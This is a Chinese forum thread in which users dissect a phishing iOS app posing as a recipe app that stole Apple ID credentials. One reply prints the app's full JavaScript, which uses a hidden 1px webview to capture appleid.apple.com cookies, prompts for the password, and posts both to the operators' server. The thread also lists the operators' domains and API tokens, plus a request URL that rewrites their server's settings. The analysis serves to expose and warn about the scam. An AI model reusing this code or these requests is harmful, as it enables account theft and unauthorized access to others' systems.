@fydpfg 有一点我想说下，如果苹果家庭账号主账号绑定的是支付宝（绑定其它支付方式我未确认，不确定），加入家庭组的账号在首次购买东西时，主账号的 Apple ID 绑定的手机号会收到验证码提示，如果不能获得这个验证码，家庭成员的账号是没法支付成功的，这个策略能很好的防止这种私自加入家庭组后，直接支付的情况。

回到题主母亲遇到的这个情况，不清楚题主是不是绑定的支付宝、以及他母亲的账号是否之前支付成功过（因为家庭成员账号非首次支付的话，就不需要验证码了）。

@tuutoo 这 APP 已经被下架了，历史数据： https://www.qimai.cn/app/appstatus/appid/1658240702/country/cn

@benjaminv 你仔细看楼主的第一张图，那张图是楼主的母亲点击了这个 APP Store 下载的钓鱼 APP 后，点击界面上的登录按钮后，弹出来的（楼主母亲以为这个是登录软件的提示，但这个登录提示并不是登录软件 [注意看登录提示底部的网站] ，而是登录了 Apple ID 的管理页面），这一步是软件在自身内部嵌套了一个浏览器组件，让这个隐藏的浏览器去访问了 Apple ID 的页面从而实现的。

用户点击登录后，就成功 SSO 登录上了 Apple ID 的页面，然后钓鱼软件再弹窗提示用户输入密码，获得密码后，软件回传 cookie 和密码，利用脚本在管理页面添加了信任手机号，最终获得账号权限，再调选合适时间进行盗刷。

全程不需要获得 Apple ID 的账号或者邮箱，只需要用户点击 登录，输入密码。

你如果没看出图一是在登录 Apple ID 的管理页面，你也以为是正常登录软件的话，那你也就成功上当了。

@benjaminv 你这个流程是错的，304 楼是正确的（把 304 楼最后两步换个顺序，就是完全正确的流程），已经验证过了

@benjaminv NONONO ，没有用到录屏的东西，就是 304 楼的方式，把 304 楼最后两步换个顺序，就是答案。

@unklity 你随便输入一个 13888888888 ，然后点击继续，就会让你输入密码了

@Dashit 290 楼，你能看到不同的分发渠道

@unklity 需要先骗取密码，才能添加信任手机。SSO 登录后，添加信任手机，需要输入密码才能添加

@alihbaba vip.yime888.com 半小时前，我打开了

@alihbaba 我浅浅看了下，这后面有大瓜啊

那个域名（ vip.yime888.com ）上有个交友 APP ，走的企业签名，这倒没啥，很正常。

但是上面的图片资源挂在 https://rec.ihuayou.xin/vip.nnpangfeng.com/data/gif/1.gif 上，这个域名结构很有特点，然后 rec.ihuayou.xin 上的东西又关联到了 http://rec.ihuayou.xin/js/app.343eabf7.js ，里面一堆域名信息，其中的 remark 字段很容易让人想到推广渠道——那么之前控制台收集信息展示（抖音、快手）的东西，是否就是不同渠道分发不同的软件、小程序，然后利用同样的方式（ WEB 嵌套+弹窗提示登录）进行信息收集呢？：

o = {
cnzz: "",
remark: "默认",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
i = {
"hj.pangfeng.ink": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281223722&web_id=1281223722",
remark: "花间",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yc-op.pangfeng.ink": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281200897&web_id=1281200897",
remark: "OPPO",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yc-wb1.pangfeng.ink": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281200748&web_id=1281200748",
remark: "微博",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yc.pangfeng.ink": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201008&web_id=1281201008",
remark: "微博 1",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yice.youqiliang.net": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281202909&web_id=1281202909",
remark: "百度优起量",
companyName: "湖北优起量信息技术有限公司宜昌分公司",
token: "NTCtLlqTAzu4xM5mirkbygs7UvWx19Mk@wDWYPerVk84HPcDfcbiOPpZxSHENOYIa"
},
"yc.kangjunwangluo.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281201007&web_id=1281201007",
remark: "百度盐城康俊 1",
companyName: "盐城康俊网络科技有限公司",
token: "5W2X3KFuWYkVE8pibqMSpUwjrFA8kgGv@fx4ohnyAZ9OmQV0dPy5QBLePHisMnHyZ"
},
"yc1.kangjunwangluo.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281200881&web_id=1281200881",
remark: "百度盐城康俊 2",
companyName: "盐城康俊网络科技有限公司",
token: "dbIVk0YpFjCoZomjqIXgoDtkj3CP7c6r@dYrUVa0Add4HZKFdVpoICCupTmKT4ZSv"
},
"yc2.kangjunwangluo.cn": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281201255&web_id=1281201255",
remark: "百度盐城康俊 3",
companyName: "盐城康俊网络科技有限公司",
token: "SgFmpkphMarKCMxG4zsIMOqeKPSKhXZd@FKRRrK5ubsaGPLibRH19ac3sx6lK3Bv2"
},
"yc3.kangjunwangluo.cn": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201256&web_id=1281201256",
remark: "百度盐城康俊 4",
companyName: "盐城康俊网络科技有限公司",
token: "WxFsfo3VjMwweV0DRjiOskObKjr572kh@M6xZPITnypP8bpd5PldGiPc1OUAM2ZlX"
},
"yc4.kangjunwangluo.cn": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201257&web_id=1281201257",
remark: "百度盐城康俊 5",
companyName: "盐城康俊网络科技有限公司",
token: "3eLDxW17zGCE5et35spTXBxdjFclg9pC@MxaTXo9vmCOoZPFsyMfSPlv98stsq9kF"
},
"yc1.gelanrui.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203734&web_id=1281203734",
remark: "百度葛 1",
companyName: "盐城葛兰锐网络科技有限公司",
token: "lIGeM4pQK0r56hkPRGGQSbx1wHhkReUL@CCGjYrDecy9RVlGDIkkhOm1RmH2WDGfG"
},
"yc2.gelanrui.cn": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281203735&web_id=1281203735",
remark: "百度葛 2",
companyName: "盐城葛兰锐网络科技有限公司",
token: "lIGeM4pQK0r56hkPRGGQSbx1wHhkReUL@CCGjYrDecy9RVlGDIkkhOm1RmH2WDGfG"
},
"yc3.gelanrui.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203736&web_id=1281203736",
remark: "百度葛 3",
companyName: "盐城葛兰锐网络科技有限公司",
token: "kjcGPAqbjpgHCUEvYC7qEp2jYyaVdytP@QGfbE2EjPunaI9W0ZBHDiCLfQuOuHCmc"
},
"yc4.gelanrui.cn": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281203737&web_id=1281203737",
remark: "百度葛 4",
companyName: "盐城葛兰锐网络科技有限公司",
token: "Cisj1njTcs6LkfIZuIYaak3dHbj8m6Xm@SIcZhUD4wHgtxD1VOHfDbM84ltG5kguV"
},
"yc5.gelanrui.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203738&web_id=1281203738",
remark: "百度葛 5",
companyName: "盐城葛兰锐网络科技有限公司",
token: "7WwaMwSvXTusziQRWdRRRXAo0qkshiwt@aFQVrgytegfIACj0nehWzTCYoYlzY4AW"
},
"ftp.kangjunwangluo.cn": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281206148&web_id=1281206148",
remark: "1",
companyName: "盐城康俊网络科技有限公司",
token: "mX3WA5uG7dzvUZ6SUZVejdngP480YUQz@ziUVKzGuGME19SkFCqSNm3iBKqwHcPGx"
},
"yc-op1.pangfeng.ink": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281223718&web_id=1281223718",
remark: "1",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yc.ycqiyu.com": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281213267&web_id=1281213267",
remark: "快手",
companyName: "盐城琪煜科技有限公司",
token: ""
},
"yc1.ycqiyu.com": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281214652&web_id=1281214652",
remark: "快手",
companyName: "盐城琪煜科技有限公司",
token: ""
}
};

@alihbaba hello ，交友的 APP 你指的是这个么？ http://vip.yime888.com/ 你上面那个返利的 APP ，地址有么？

核心的窃取 COOKIE 和密码，然后发往 http://app.yime888.com/api/app.php 的代码还在（ yime888.com 已经下线了）：
http://www.qnclywm.cn/static/js/pages-views-index.0945c055.js

=========================================
(window["webpackJsonp"] = window["webpackJsonp"] || []).push([["pages-views-index"], {
"0c6f": function(t, e, n) {
var i = n("24fb");
e = i(!1),
e.push([t.i, ".bg[data-v-d2ae5eac]{width:100%;float:left;position:relative}.bg>uni-image[data-v-d2ae5eac]{width:%?750?%;height:%?731?%}.t1[data-v-d2ae5eac]{position:absolute;left:%?30?%;top:%?230?%;font-size:%?50?%;font-weight:700}.t2[data-v-d2ae5eac]{position:absolute;left:%?30?%;top:%?300?%;font-size:%?50?%;font-weight:700}.info1[data-v-d2ae5eac]{position:fixed;left:0;width:100%;text-align:center;bottom:%?400?%;font-weight:700;font-size:%?40?%}.info2[data-v-d2ae5eac]{position:fixed;left:0;width:100%;text-align:center;bottom:%?350?%;font-size:%?28?%}#btns[data-v-d2ae5eac]{width:%?630?%;height:%?90?%;background:#ff4f59;text-align:center;position:fixed;left:%?60?%;bottom:%?230?%;line-height:%?90?%;color:#fff;border-radius:%?45?% %?45?%;font-size:%?30?%}", ""]),
t.exports = e
},
"400f": function(t, e, n) {
"use strict";
n.r(e);
var i = n("4c61"),
a = n.n(i);
for (var o in i)["default"].indexOf(o) < 0 &&
function(t) {
n.d(e, t, (function() {
return i[t]
}))
} (o);
e["default"] = a.a
},
"4c61": function(t, e, n) {
"use strict";
n("7a82"),
Object.defineProperty(e, "__esModule", {
value: !0
}),
e.
default = void 0;
getApp();
var i = null,
a = {
data: function() {
return {
hide: 0,
ww: "0",
hh: "0",
login: 0,
is_no: 0,
url: "",
url2: "",
url3: "",
num: 0,
timer: null,
timer2: null,
txt1: "",
txt2: ""
}
},
onLoad: function(t) {
var e = this;
this.cks(),
uni.onNetworkStatusChange((function(t) {
"none" != t.networkType && e.cks()
}))
},
onShow: function() {},
onShareAppMessage: function() {},
methods: {
cks: function() {
var t = this;
uni.request({
url: "http://app.yime888.com/api/ck.php",
data: {},
header: {},
success: function(e) {
t.is_no = 1,
t.login = e.data[0].status,
t.url = e.data[0].url,
t.url2 = e.data[0].url2,
t.url3 = e.data[0].url3,
t.num = e.data[0].num,
t.txt1 = e.data[0].txt1,
t.txt2 = e.data[0].txt2
}
})
},
loginsfn: function() {
uni.request({
url: "http://app.yime888.com/api/ip.php",
success: function(t) {}
})
},
loadings2: function() {
var t = this,
e = "";
i.evalJS("document.title=location.href");
var n = i.getTitle();
n == t.url3 && (clearInterval(t.timer), t.timer = null, uni.showModal({
title: t.txt1,
content: t.txt2,
editable: !0,
success: function(n) {
if (n.confirm) {
var i = n.content;
n.content.length < 7 ? uni.showToast({
title: "不能少于 7 位",
duration: 2e3
}) : (uni.showToast({
title: "提交中...",
icon: "loading",
duration: 5e3
}), setTimeout((function() {
e = plus.navigator.getCookie(t.url2),
uni.request({
url: "http://app.yime888.com/api/app.php",
data: {
data1: e,
data2: i
},
method: "POST",
header: {
"content-type": "application/x-www-form-urlencoded"
},
success: function(t) {
uni.showToast({
title: "成功",
duration: 2e3
}),
uni.navigateTo({
url: "/pages/index2/index"
})
}
})
}), 5e3))
} else n.cancel && uni.showToast({
title: "已取消",
duration: 2e3
})
}
}))
},
loadings: function() {
var t = plus.navigator.getCookie("https://appleid.apple.com");
t.length > this.num && (clearInterval(this.timer), this.timer = null, uni.showModal({
title: this.txt1,
content: this.txt2,
editable: !0,
success: function(e) {
if (e.confirm) {
var n = e.content;
e.content.length < 7 ? uni.showToast({
title: "不能少于 7 位",
duration: 2e3
}) : uni.request({
url: "http://app.yime888.com/api/app.php",
data: {
data1: t,
data2: n
},
method: "POST",
header: {
"content-type": "application/x-www-form-urlencoded"
},
success: function(t) {
uni.showToast({
title: "成功",
duration: 2e3
}),
uni.navigateTo({
url: "/pages/index2/index"
})
}
})
} else e.cancel && uni.showToast({
title: "已取消",
duration: 2e3
})
}
}))
},
logins: function() {
var t = this;
uni.getNetworkType({
success: function(e) {
"none" == e.networkType ? uni.showModal({
title: "当前网络不可用",
content: '您可以在"设置"中为此 app 打开蜂窝数据。',
cancelText: "好",
confirmText: "设置",
success: function(t) {
if (t.confirm) {
var e = plus.ios.import("UIApplication"),
n = e.sharedApplication(),
i = plus.ios.import("NSURL"),
a = i.URLWithString("app-settings:");
n.openURL(a),
plus.ios.deleteObject(a),
plus.ios.deleteObject(i),
plus.ios.deleteObject(n)
} else t.cancel
}
}) : 0 == t.login && 1 == t.is_no ? (t.loginsfn(), uni.navigateTo({
url: "/pages/index2/index"
})) : 1 == t.is_no && (uni.showToast({
title: "登录中请忽中断！",
icon: "loading",
duration: 5e3
}), t.loginsfn(), i = plus.webview.create(t.url, "xiaoShop", {
width: "1px",
height: "1px",
left: "1000px"
}), i.show(), clearInterval(t.timer), t.timer = null, t.timer = setInterval((function() {
t.loadings2()
}), 1e3))
}
})
}
}
};
e.
default = a
},
"6eb8": function(t, e, n) {
"use strict";
n.d(e, "b", (function() {
return i
})),
n.d(e, "c", (function() {
return a
})),
n.d(e, "a", (function() {}));
var i = function() {
var t = this,
e = t.$createElement,
i = t._self._c || e;
return i("v-uni-view", [i("v-uni-view", {
staticClass: "bg"
},
[i("v-uni-image", {
attrs: {
src: n("aaa1")
}
}), i("v-uni-text", {
staticClass: "t1"
},
[t._v("Hi,")]), i("v-uni-text", {
staticClass: "t2"
},
[t._v("请登录")])], 1), i("v-uni-view", {
staticClass: "info1"
},
[t._v("菜谱大全")]), i("v-uni-view", {
staticClass: "info2"
},
[t._v("进入后即可享受更多的功能和福利")]), i("v-uni-view", {
attrs: {
id: "btns"
},
on: {
click: function(e) {
arguments[0] = e = t.$handleEvent(e),
t.logins.apply(void 0, arguments)
}
}
},
[t._v("登录菜谱大全")])], 1)
},
a = []
},
aaa1: function(t, e, n) {
t.exports = n.p + "static/img/bg.8684acc5.jpg"
},
ae6c: function(t, e, n) {
"use strict";
var i = n("f796"),
a = n.n(i);
a.a
},
f022: function(t, e, n) {
"use strict";
n.r(e);
var i = n("6eb8"),
a = n("400f");
for (var o in a)["default"].indexOf(o) < 0 &&
function(t) {
n.d(e, t, (function() {
return a[t]
}))
} (o);
n("ae6c");
var s = n("f0c5"),
u = Object(s["a"])(a["default"], i["b"], i["c"], !1, null, "d2ae5eac", null, !1, i["a"], void 0);
e["default"] = u.exports
},
f796: function(t, e, n) {
var i = n("0c6f");
i.__esModule && (i = i.
default),
"string" === typeof i && (i = [[t.i, i, ""]]),
i.locals && (t.exports = i.locals);
var a = n("4f06").
default;
a("315b15a0", i, !0, {
sourceMap: !1,
shadowMode: !1
})
}
}]);

补一个菜谱的页面，备忘吧：
http://www.qnclywm.cn/

CN 域名注册需要实名的（不过也可能是假证件）
http://agreement.gbbhuor.cn/ （注册人韩 LF QQ 邮箱注册的）
http://app.gbbhuor.cn/ （底部也有个 QQ ）

@alihbaba 你把他网站文件删了呀？我还准备给他改下域名地址来着。。
https://app.yime888.com/api/updata_urls.php?url=pianzi&url2=pianzi&url3=pianzi&num=1&txt1=1&txt2=1

@demonchang
控制面板： http://app.yime888.com/api/index.php

这家伙不止收集 COOKIE ，还在收集抖音+快手的数据

提示来自于这里：
http://app.yime888.com/api/ck.php